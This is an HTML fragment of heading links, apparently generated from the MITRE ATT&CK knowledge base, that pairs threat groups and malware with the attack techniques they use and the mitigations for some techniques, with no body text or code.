<h3 id="_flashflood_s0036_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_flashflood_s0036_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_flashflood_s0036_uses_file_and_directory_discovery_t1083">FLASHFLOOD (S0036) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_mimikatz_s0002"><a class="anchor" href="#_apt1_g0006_uses_mimikatz_s0002"></a><a class="link" href="#_apt1_g0006_uses_mimikatz_s0002">APT1 (G0006) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_execution_through_api_t1106"><a class="anchor" href="#_xagentosx_s0161_uses_execution_through_api_t1106"></a><a class="link" href="#_xagentosx_s0161_uses_execution_through_api_t1106">XAgentOSX (S0161) uses Execution through API (T1106)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_data_from_removable_media_t1025"><a class="anchor" href="#_prikormka_s0113_uses_data_from_removable_media_t1025"></a><a class="link" href="#_prikormka_s0113_uses_data_from_removable_media_t1025">Prikormka (S0113) uses Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_scheduled_task_t1053"><a class="anchor" href="#_jhuhugit_s0044_uses_scheduled_task_t1053"></a><a class="link" href="#_jhuhugit_s0044_uses_scheduled_task_t1053">JHUHUGIT (S0044) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_redundant_access_t1108"><a class="anchor" href="#_threat_group_3390_g0027_uses_redundant_access_t1108"></a><a class="link" href="#_threat_group_3390_g0027_uses_redundant_access_t1108">Threat Group-3390 (G0027) uses Redundant Access (T1108)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_support_provider_mitigation_t1101_mitigates_security_support_provider_t1101"><a class="anchor" href="#_security_support_provider_mitigation_t1101_mitigates_security_support_provider_t1101"></a><a class="link" href="#_security_support_provider_mitigation_t1101_mitigates_security_support_provider_t1101">Security Support Provider Mitigation (T1101) mitigates Security Support Provider (T1101)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_magic_hound_g0059_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_magic_hound_g0059_uses_standard_application_layer_protocol_t1071">Magic Hound (G0059) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_advstoreshell_s0045_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_advstoreshell_s0045_uses_standard_cryptographic_protocol_t1032">ADVSTORESHELL (S0045) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_remote_file_copy_t1105"><a class="anchor" href="#_h1n1_s0132_uses_remote_file_copy_t1105"></a><a class="link" href="#_h1n1_s0132_uses_remote_file_copy_t1105">H1N1 (S0132) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_matroyshka_s0167_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_matroyshka_s0167_uses_registry_run_keys_start_folder_t1060">Matroyshka (S0167) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_new_service_t1050"><a class="anchor" href="#_carbanak_g0008_uses_new_service_t1050"></a><a class="link" href="#_carbanak_g0008_uses_new_service_t1050">Carbanak (G0008) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_miniduke_s0051_uses_remote_file_copy_t1105"><a class="anchor" href="#_miniduke_s0051_uses_remote_file_copy_t1105"></a><a class="link" href="#_miniduke_s0051_uses_remote_file_copy_t1105">MiniDuke (S0051) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_remote_system_discovery_t1018"><a class="anchor" href="#_apt3_g0022_uses_remote_system_discovery_t1018"></a><a class="link" href="#_apt3_g0022_uses_remote_system_discovery_t1018">APT3 (G0022) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_windows_admin_shares_t1077"><a class="anchor" href="#_cobalt_strike_s0154_uses_windows_admin_shares_t1077"></a><a class="link" href="#_cobalt_strike_s0154_uses_windows_admin_shares_t1077">Cobalt Strike (S0154) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_winnti_s0141_uses_new_service_t1050"><a class="anchor" href="#_winnti_s0141_uses_new_service_t1050"></a><a class="link" href="#_winnti_s0141_uses_new_service_t1050">Winnti (S0141) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_china_chopper_s0020_uses_command_line_interface_t1059"><a class="anchor" href="#_china_chopper_s0020_uses_command_line_interface_t1059"></a><a class="link" href="#_china_chopper_s0020_uses_command_line_interface_t1059">China Chopper (S0020) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_mimikatz_s0002"><a class="anchor" href="#_carbanak_g0008_uses_mimikatz_s0002"></a><a class="link" href="#_carbanak_g0008_uses_mimikatz_s0002">Carbanak (G0008) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_rundll32_mitigation_t1085_mitigates_rundll32_t1085"><a class="anchor" href="#_rundll32_mitigation_t1085_mitigates_rundll32_t1085"></a><a class="link" href="#_rundll32_mitigation_t1085_mitigates_rundll32_t1085">Rundll32 Mitigation (T1085) mitigates Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_scheduled_task_t1053"><a class="anchor" href="#_rtm_s0148_uses_scheduled_task_t1053"></a><a class="link" href="#_rtm_s0148_uses_scheduled_task_t1053">RTM (S0148) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_modify_registry_t1112"><a class="anchor" href="#_shamoon_s0140_uses_modify_registry_t1112"></a><a class="link" href="#_shamoon_s0140_uses_modify_registry_t1112">Shamoon (S0140) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_xagentosx_s0161_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_xagentosx_s0161_uses_system_owner_user_discovery_t1033">XAgentOSX (S0161) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_s0019_uses_ntfs_extended_attributes_t1096"><a class="anchor" href="#_regin_s0019_uses_ntfs_extended_attributes_t1096"></a><a class="link" href="#_regin_s0019_uses_ntfs_extended_attributes_t1096">Regin (S0019) uses NTFS Extended Attributes (T1096)</a></h3>
</div>
<div class="sect2">
<h3 id="_winmm_s0059_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_winmm_s0059_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_winmm_s0059_uses_system_owner_user_discovery_t1033">WinMM (S0059) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_badnews_s0128_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_badnews_s0128_uses_custom_cryptographic_protocol_t1024">BADNEWS (S0128) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_pteranodon_s0147_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_pteranodon_s0147_uses_file_and_directory_discovery_t1083">Pteranodon (S0147) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_cobalt_strike_s0154_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_cobalt_strike_s0154_uses_windows_management_instrumentation_t1047">Cobalt Strike (S0154) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_logon_scripts_t1037"><a class="anchor" href="#_jhuhugit_s0044_uses_logon_scripts_t1037"></a><a class="link" href="#_jhuhugit_s0044_uses_logon_scripts_t1037">JHUHUGIT (S0044) uses Logon Scripts (T1037)</a></h3>
</div>
<div class="sect2">
<h3 id="_strider_g0041_uses_credential_dumping_t1003"><a class="anchor" href="#_strider_g0041_uses_credential_dumping_t1003"></a><a class="link" href="#_strider_g0041_uses_credential_dumping_t1003">Strider (G0041) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047_uses_system_information_discovery_t1082"><a class="anchor" href="#_gamaredon_group_g0047_uses_system_information_discovery_t1082"></a><a class="link" href="#_gamaredon_group_g0047_uses_system_information_discovery_t1082">Gamaredon Group (G0047) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_brute_force_t1110"><a class="anchor" href="#_apt34_g0057_uses_brute_force_t1110"></a><a class="link" href="#_apt34_g0057_uses_brute_force_t1110">APT34 (G0057) uses Brute Force (T1110)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_schtasks_s0111"><a class="anchor" href="#_apt3_g0022_uses_schtasks_s0111"></a><a class="link" href="#_apt3_g0022_uses_schtasks_s0111">APT3 (G0022) uses schtasks (S0111)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_security_software_discovery_t1063"><a class="anchor" href="#_naikon_g0019_uses_security_software_discovery_t1063"></a><a class="link" href="#_naikon_g0019_uses_security_software_discovery_t1063">Naikon (G0019) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_redleaves_s0153_uses_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_redleaves_s0153_uses_custom_command_and_control_protocol_t1094">RedLeaves (S0153) uses Custom Command and Control Protocol (T1094)</a></h3>
</div>
<div class="sect2">
<h3 id="_hidedrv_s0135_uses_rootkit_t1014"><a class="anchor" href="#_hidedrv_s0135_uses_rootkit_t1014"></a><a class="link" href="#_hidedrv_s0135_uses_rootkit_t1014">HIDEDRV (S0135) uses Rootkit (T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_web_shell_t1100"><a class="anchor" href="#_apt32_g0050_uses_web_shell_t1100"></a><a class="link" href="#_apt32_g0050_uses_web_shell_t1100">APT32 (G0050) uses Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_rundll32_t1085"><a class="anchor" href="#_elise_s0081_uses_rundll32_t1085"></a><a class="link" href="#_elise_s0081_uses_rundll32_t1085">Elise (S0081) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_mimipenguin_s0179_uses_credential_dumping_t1003"><a class="anchor" href="#_mimipenguin_s0179_uses_credential_dumping_t1003"></a><a class="link" href="#_mimipenguin_s0179_uses_credential_dumping_t1003">MimiPenguin (S0179) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_network_share_connection_removal_mitigation_t1126_mitigates_network_share_connection_removal_t1126"><a class="anchor" href="#_network_share_connection_removal_mitigation_t1126_mitigates_network_share_connection_removal_t1126"></a><a class="link" href="#_network_share_connection_removal_mitigation_t1126_mitigates_network_share_connection_removal_t1126">Network Share Connection Removal Mitigation (T1126) mitigates Network Share Connection Removal (T1126)</a></h3>
</div>
<div class="sect2">
<h3 id="_spaceship_s0035_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_spaceship_s0035_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_spaceship_s0035_uses_registry_run_keys_start_folder_t1060">SPACESHIP (S0035) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_data_compressed_t1002"><a class="anchor" href="#_sowbug_g0054_uses_data_compressed_t1002"></a><a class="link" href="#_sowbug_g0054_uses_data_compressed_t1002">Sowbug (G0054) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt18_g0026_uses_gh0st_s0032"><a class="anchor" href="#_apt18_g0026_uses_gh0st_s0032"></a><a class="link" href="#_apt18_g0026_uses_gh0st_s0032">APT18 (G0026) uses gh0st (S0032)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_credential_dumping_t1003"><a class="anchor" href="#_threat_group_3390_g0027_uses_credential_dumping_t1003"></a><a class="link" href="#_threat_group_3390_g0027_uses_credential_dumping_t1003">Threat Group-3390 (G0027) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_web_shell_t1100"><a class="anchor" href="#_oilrig_g0049_uses_web_shell_t1100"></a><a class="link" href="#_oilrig_g0049_uses_web_shell_t1100">OilRig (G0049) uses Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_masquerading_t1036"><a class="anchor" href="#_fin7_g0046_uses_masquerading_t1036"></a><a class="link" href="#_fin7_g0046_uses_masquerading_t1036">FIN7 (G0046) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_file_deletion_t1107"><a class="anchor" href="#_dragonfly_g0035_uses_file_deletion_t1107"></a><a class="link" href="#_dragonfly_g0035_uses_file_deletion_t1107">Dragonfly (G0035) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_felismus_s0171_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_felismus_s0171_uses_custom_cryptographic_protocol_t1024">Felismus (S0171) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_cozycar_s0046_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_cozycar_s0046_uses_registry_run_keys_start_folder_t1060">CozyCar (S0046) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_apt34_g0057_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_apt34_g0057_uses_obfuscated_files_or_information_t1027">APT34 (G0057) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_apt1_g0006_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_apt1_g0006_uses_remote_desktop_protocol_t1076">APT1 (G0006) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_multilayer_encryption_mitigation_t1079_mitigates_multilayer_encryption_t1079"><a class="anchor" href="#_multilayer_encryption_mitigation_t1079_mitigates_multilayer_encryption_t1079"></a><a class="link" href="#_multilayer_encryption_mitigation_t1079_mitigates_multilayer_encryption_t1079">Multilayer Encryption Mitigation (T1079) mitigates Multilayer Encryption (T1079)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_input_capture_t1056"><a class="anchor" href="#_badnews_s0128_uses_input_capture_t1056"></a><a class="link" href="#_badnews_s0128_uses_input_capture_t1056">BADNEWS (S0128) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_scheduled_task_t1053"><a class="anchor" href="#_fin6_g0037_uses_scheduled_task_t1053"></a><a class="link" href="#_fin6_g0037_uses_scheduled_task_t1053">FIN6 (G0037) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_rtm_s0148_uses_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_rtm_s0148_uses_custom_command_and_control_protocol_t1094">RTM (S0148) uses Custom Command and Control Protocol (T1094)</a></h3>
</div>
<div class="sect2">
<h3 id="_seasharpee_s0185_uses_web_shell_t1100"><a class="anchor" href="#_seasharpee_s0185_uses_web_shell_t1100"></a><a class="link" href="#_seasharpee_s0185_uses_web_shell_t1100">SEASHARPEE (S0185) uses Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_input_capture_t1056"><a class="anchor" href="#_threat_group_3390_g0027_uses_input_capture_t1056"></a><a class="link" href="#_threat_group_3390_g0027_uses_input_capture_t1056">Threat Group-3390 (G0027) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_new_service_t1050"><a class="anchor" href="#_shamoon_s0140_uses_new_service_t1050"></a><a class="link" href="#_shamoon_s0140_uses_new_service_t1050">Shamoon (S0140) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_apt34_g0057_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_apt34_g0057_uses_standard_cryptographic_protocol_t1032">APT34 (G0057) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_lslsass_s0121_uses_credential_dumping_t1003"><a class="anchor" href="#_lslsass_s0121_uses_credential_dumping_t1003"></a><a class="link" href="#_lslsass_s0121_uses_credential_dumping_t1003">Lslsass (S0121) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_software_packing_mitigation_t1045_mitigates_software_packing_t1045"><a class="anchor" href="#_software_packing_mitigation_t1045_mitigates_software_packing_t1045"></a><a class="link" href="#_software_packing_mitigation_t1045_mitigates_software_packing_t1045">Software Packing Mitigation (T1045) mitigates Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_dragonfly_g0035_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_dragonfly_g0035_uses_remote_desktop_protocol_t1076">Dragonfly (G0035) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_aspxspy_s0073_uses_web_shell_t1100"><a class="anchor" href="#_aspxspy_s0073_uses_web_shell_t1100"></a><a class="link" href="#_aspxspy_s0073_uses_web_shell_t1100">ASPXSpy (S0073) uses Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_process_injection_t1055"><a class="anchor" href="#_sykipot_s0018_uses_process_injection_t1055"></a><a class="link" href="#_sykipot_s0018_uses_process_injection_t1055">Sykipot (S0018) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_component_object_model_hijacking_t1122"><a class="anchor" href="#_bbsrat_s0127_uses_component_object_model_hijacking_t1122"></a><a class="link" href="#_bbsrat_s0127_uses_component_object_model_hijacking_t1122">BBSRAT (S0127) uses Component Object Model Hijacking (T1122)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_sowbug_g0054_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_sowbug_g0054_uses_file_and_directory_discovery_t1083">Sowbug (G0054) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_schtasks_s0111"><a class="anchor" href="#_bronze_butler_g0060_uses_schtasks_s0111"></a><a class="link" href="#_bronze_butler_g0060_uses_schtasks_s0111">BRONZE BUTLER (G0060) uses schtasks (S0111)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_remote_file_copy_t1105"><a class="anchor" href="#_patchwork_g0040_uses_remote_file_copy_t1105"></a><a class="link" href="#_patchwork_g0040_uses_remote_file_copy_t1105">Patchwork (G0040) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_halfbaked_s0151_uses_powershell_t1086"><a class="anchor" href="#_halfbaked_s0151_uses_powershell_t1086"></a><a class="link" href="#_halfbaked_s0151_uses_powershell_t1086">HALFBAKED (S0151) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_derusbi_s0021_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_derusbi_s0021_uses_file_and_directory_discovery_t1083">Derusbi (S0021) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_pittytiger_g0011_uses_gh0st_s0032"><a class="anchor" href="#_pittytiger_g0011_uses_gh0st_s0032"></a><a class="link" href="#_pittytiger_g0011_uses_gh0st_s0032">PittyTiger (G0011) uses gh0st (S0032)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_input_capture_t1056"><a class="anchor" href="#_helminth_s0170_uses_input_capture_t1056"></a><a class="link" href="#_helminth_s0170_uses_input_capture_t1056">Helminth (S0170) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_email_collection_t1114"><a class="anchor" href="#_dragonfly_g0035_uses_email_collection_t1114"></a><a class="link" href="#_dragonfly_g0035_uses_email_collection_t1114">Dragonfly (G0035) uses Email Collection (T1114)</a></h3>
</div>
<div class="sect2">
<h3 id="_poshspy_s0150_uses_remote_file_copy_t1105"><a class="anchor" href="#_poshspy_s0150_uses_remote_file_copy_t1105"></a><a class="link" href="#_poshspy_s0150_uses_remote_file_copy_t1105">POSHSPY (S0150) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_turla_g0010_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_turla_g0010_uses_system_network_configuration_discovery_t1016">Turla (G0010) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_email_collection_t1114"><a class="anchor" href="#_cosmicduke_s0050_uses_email_collection_t1114"></a><a class="link" href="#_cosmicduke_s0050_uses_email_collection_t1114">CosmicDuke (S0050) uses Email Collection (T1114)</a></h3>
</div>
<div class="sect2">
<h3 id="_psexec_s0029_uses_windows_admin_shares_t1077"><a class="anchor" href="#_psexec_s0029_uses_windows_admin_shares_t1077"></a><a class="link" href="#_psexec_s0029_uses_windows_admin_shares_t1077">PsExec (S0029) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_downpaper_s0186_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_downpaper_s0186_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_downpaper_s0186_uses_registry_run_keys_start_folder_t1060">DownPaper (S0186) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_masquerading_t1036"><a class="anchor" href="#_bronze_butler_g0060_uses_masquerading_t1036"></a><a class="link" href="#_bronze_butler_g0060_uses_masquerading_t1036">BRONZE BUTLER (G0060) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_rundll32_t1085"><a class="anchor" href="#_prikormka_s0113_uses_rundll32_t1085"></a><a class="link" href="#_prikormka_s0113_uses_rundll32_t1085">Prikormka (S0113) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_web_service_t1102"><a class="anchor" href="#_carbanak_g0008_uses_web_service_t1102"></a><a class="link" href="#_carbanak_g0008_uses_web_service_t1102">Carbanak (G0008) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_elise_s0081_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_elise_s0081_uses_registry_run_keys_start_folder_t1060">Elise (S0081) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_hammertoss_s0037_uses_powershell_t1086"><a class="anchor" href="#_hammertoss_s0037_uses_powershell_t1086"></a><a class="link" href="#_hammertoss_s0037_uses_powershell_t1086">HAMMERTOSS (S0037) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_lowball_s0042"><a class="anchor" href="#_admin_338_g0018_uses_lowball_s0042"></a><a class="link" href="#_admin_338_g0018_uses_lowball_s0042">admin@338 (G0018) uses LOWBALL (S0042)</a></h3>
</div>
<div class="sect2">
<h3 id="_meek_s0175_uses_domain_fronting_t1172"><a class="anchor" href="#_meek_s0175_uses_domain_fronting_t1172"></a><a class="link" href="#_meek_s0175_uses_domain_fronting_t1172">meek (S0175) uses Domain Fronting (T1172)</a></h3>
</div>
<div class="sect2">
<h3 id="_komplex_s0162_uses_file_deletion_t1107"><a class="anchor" href="#_komplex_s0162_uses_file_deletion_t1107"></a><a class="link" href="#_komplex_s0162_uses_file_deletion_t1107">Komplex (S0162) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_mivast_s0080"><a class="anchor" href="#_deep_panda_g0009_uses_mivast_s0080"></a><a class="link" href="#_deep_panda_g0009_uses_mivast_s0080">Deep Panda (G0009) uses Mivast (S0080)</a></h3>
</div>
<div class="sect2">
<h3 id="_reg_s0075_uses_modify_registry_t1112"><a class="anchor" href="#_reg_s0075_uses_modify_registry_t1112"></a><a class="link" href="#_reg_s0075_uses_modify_registry_t1112">Reg (S0075) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_volgmer_s0180_uses_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_volgmer_s0180_uses_custom_command_and_control_protocol_t1094">Volgmer (S0180) uses Custom Command and Control Protocol (T1094)</a></h3>
</div>
<div class="sect2">
<h3 id="_replication_through_removable_media_mitigation_t1091_mitigates_replication_through_removable_media_t1091"><a class="anchor" href="#_replication_through_removable_media_mitigation_t1091_mitigates_replication_through_removable_media_t1091"></a><a class="link" href="#_replication_through_removable_media_mitigation_t1091_mitigates_replication_through_removable_media_t1091">Replication Through Removable Media Mitigation (T1091) mitigates Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_downpaper_s0186_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_downpaper_s0186_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_downpaper_s0186_uses_standard_application_layer_protocol_t1071">DownPaper (S0186) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_system_information_discovery_t1082"><a class="anchor" href="#_apt28_g0007_uses_system_information_discovery_t1082"></a><a class="link" href="#_apt28_g0007_uses_system_information_discovery_t1082">APT28 (G0007) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_scheduled_transfer_t1029"><a class="anchor" href="#_cobalt_strike_s0154_uses_scheduled_transfer_t1029"></a><a class="link" href="#_cobalt_strike_s0154_uses_scheduled_transfer_t1029">Cobalt Strike (S0154) uses Scheduled Transfer (T1029)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_system_information_discovery_t1082"><a class="anchor" href="#_zlib_s0086_uses_system_information_discovery_t1082"></a><a class="link" href="#_zlib_s0086_uses_system_information_discovery_t1082">ZLib (S0086) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_h1n1_s0132_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_h1n1_s0132_uses_obfuscated_files_or_information_t1027">H1N1 (S0132) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_plist_modification_mitigation_t1150_mitigates_plist_modification_t1150"><a class="anchor" href="#_plist_modification_mitigation_t1150_mitigates_plist_modification_t1150"></a><a class="link" href="#_plist_modification_mitigation_t1150_mitigates_plist_modification_t1150">Plist Modification Mitigation (T1150) mitigates Plist Modification (T1150)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_psexec_s0029"><a class="anchor" href="#_fin5_g0053_uses_psexec_s0029"></a><a class="link" href="#_fin5_g0053_uses_psexec_s0029">FIN5 (G0053) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_webc2_s0109"><a class="anchor" href="#_apt1_g0006_uses_webc2_s0109"></a><a class="link" href="#_apt1_g0006_uses_webc2_s0109">APT1 (G0006) uses WEBC2 (S0109)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_system_information_discovery_t1082"><a class="anchor" href="#_chches_s0144_uses_system_information_discovery_t1082"></a><a class="link" href="#_chches_s0144_uses_system_information_discovery_t1082">ChChes (S0144) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_duqu_s0038_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_duqu_s0038_uses_system_network_connections_discovery_t1049">Duqu (S0038) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
